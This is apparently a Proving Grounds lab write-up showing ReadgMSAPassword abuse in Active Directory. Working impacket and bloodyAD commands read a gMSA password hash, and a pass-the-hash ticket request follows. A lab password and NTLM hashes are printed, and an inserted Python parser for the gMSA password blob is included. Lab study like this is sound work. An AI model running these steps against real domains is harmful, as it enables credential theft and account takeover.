ReadgMSAPassword


It has been identified that the compromised domain user, enox, has the ReadgMSAPassword privilege over the svc_apache$ account due to its membership in the Web Admins group. This was also enumerated by adPEAS.

The msDS-ManagedPassword attribute is a special LDAP attribute that holds the gMSA password blob; a principal with ReadgMSAPassword can read it directly.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/heist]
└─$ impacket-getTGT HEIST.OFFSEC/enox@dc01.heist.offsec -dc-ip $IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: california
[*] Saving ticket in enox@dc01.heist.offsec.ccache

Validated against the KDC running on the DC host dc01.heist.offsec (172.16.155.6): a TGT was generated for the enox user.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/heist]
└─$ KRB5CCNAME=enox@dc01.heist.offsec.ccache bloodyAD -d HEIST.OFFSEC -k --host dc01.heist.offsec --dc-ip $IP get object 'svc_apache$' --attr msDS-ManagedPassword           
 
distinguishedName: CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:f018713880015ab7b496f7bbf049f0fc
msDS-ManagedPassword.B64ENCODED: AXmB3EJZCuJRGdjmX6X1ItHNveRYSeSt579nnI8kF6jrkTS5hsR6izvdNFQrXg8Nkg44uvej90PvmB4nAb6mI2DgzlnNkOP/1WzNsRg+Tkvr7zEtxnpFfpQWAB8N6eslDIsLS0JSysaLMX/EGzLZGNmGltwCVXPQXDOI0VeZgoNCjopFZRoVoYlz3kwkcTW6HZu4/g/UpuguUNqm6ekPYp9Oh0EcmWWos8KZv/tK8xprmjGzTt1yfkkEnDFiTfge56HFjLlr42CBoSo07W4SG1dBW+ILFj4D7y3xwQQLZ+HUJsohHyp8nDErMdOt3Focxgs98LZoYjn9YYAvXYk/Mg==

aad3b435b51404eeaad3b435b51404ee:f018713880015ab7b496f7bbf049f0fc
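The two decoded lines bloodyAD prints (msDS-ManagedPassword.NTLM and .B64ENCODED) come from unpacking the MSDS-MANAGEDPASSWORD_BLOB structure that the attribute returns. As an added illustration that is not part of the original writeup or of bloodyAD, the parser below decodes that structure on a constructed blob (the sample password and intervals are made up); the NT hash the tool shows is MD4 over the current-password bytes this extracts.

```python
import struct

# MSDS-MANAGEDPASSWORD_BLOB header (MS-ADTS 2.2.20), little-endian: Version, Reserved,
# Length, then offsets of CurrentPassword, PreviousPassword, QueryInterval, UnchangedInterval.
_HEADER = struct.Struct("<HHIHHHH")
_TICKS_PER_SECOND = 10_000_000  # intervals are counted in 100-nanosecond units

def _utf16z(blob, off):
    """Return the UTF-16LE bytes at `off` up to (not including) the 2-byte null terminator."""
    end = off
    while end + 2 <= len(blob) and blob[end:end + 2] != b"\x00\x00":
        end += 2
    if end + 2 > len(blob):
        raise ValueError("unterminated UTF-16LE password field")
    return blob[off:end]

def parse_managed_password_blob(blob):
    """Decode a raw msDS-ManagedPassword value into its documented fields."""
    if len(blob) < _HEADER.size:
        raise ValueError("blob shorter than the 16-byte header")
    version, reserved, length, cur, prev, query, unchanged = _HEADER.unpack_from(blob)
    if version != 1 or reserved != 0 or length != len(blob):
        raise ValueError("not a version-1 blob or length field does not match")
    # The NT hash that tools print is MD4 over exactly these current-password bytes.
    current_pw = _utf16z(blob, cur)
    previous_pw = _utf16z(blob, prev) if prev else None  # offset 0 means no previous password
    (q_ticks,) = struct.unpack_from("<Q", blob, query)
    (u_ticks,) = struct.unpack_from("<Q", blob, unchanged)
    return {
        "current_password": current_pw,
        "previous_password": previous_pw,
        "query_interval_seconds": q_ticks // _TICKS_PER_SECOND,
        "unchanged_interval_seconds": u_ticks // _TICKS_PER_SECOND,
    }

def build_blob(current, previous, query_seconds, unchanged_seconds):
    """Constructed fixture builder (not real AD data): lay a blob out as the header describes."""
    body = current + b"\x00\x00"
    prev_off = 0
    if previous is not None:
        prev_off = _HEADER.size + len(body)
        body += previous + b"\x00\x00"
    body += b"\x00" * (-(_HEADER.size + len(body)) % 8)  # AlignmentPadding to an 8-byte boundary
    query_off = _HEADER.size + len(body)
    body += struct.pack("<QQ", query_seconds * _TICKS_PER_SECOND, unchanged_seconds * _TICKS_PER_SECOND)
    return _HEADER.pack(1, 0, _HEADER.size + len(body), _HEADER.size, prev_off, query_off, query_off + 8) + body

# Constructed sample: a short password stands in for the 256-byte random value a real gMSA carries.
SAMPLE_BLOB = build_blob("gMSA-demo-pw".encode("utf-16-le"), None, 30 * 86400, 29 * 86400)
```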

Validation


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/heist]
└─$ impacket-getTGT HEIST.OFFSEC/'svc_apache$'@dc01.heist.offsec -hashes aad3b435b51404eeaad3b435b51404ee:f018713880015ab7b496f7bbf049f0fc -dc-ip $IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Saving ticket in svc_apache$@dc01.heist.offsec.ccache

Validated against the KDC running on the DC host dc01.heist.offsec (172.16.155.6): a TGT was generated for the svc_apache$ account.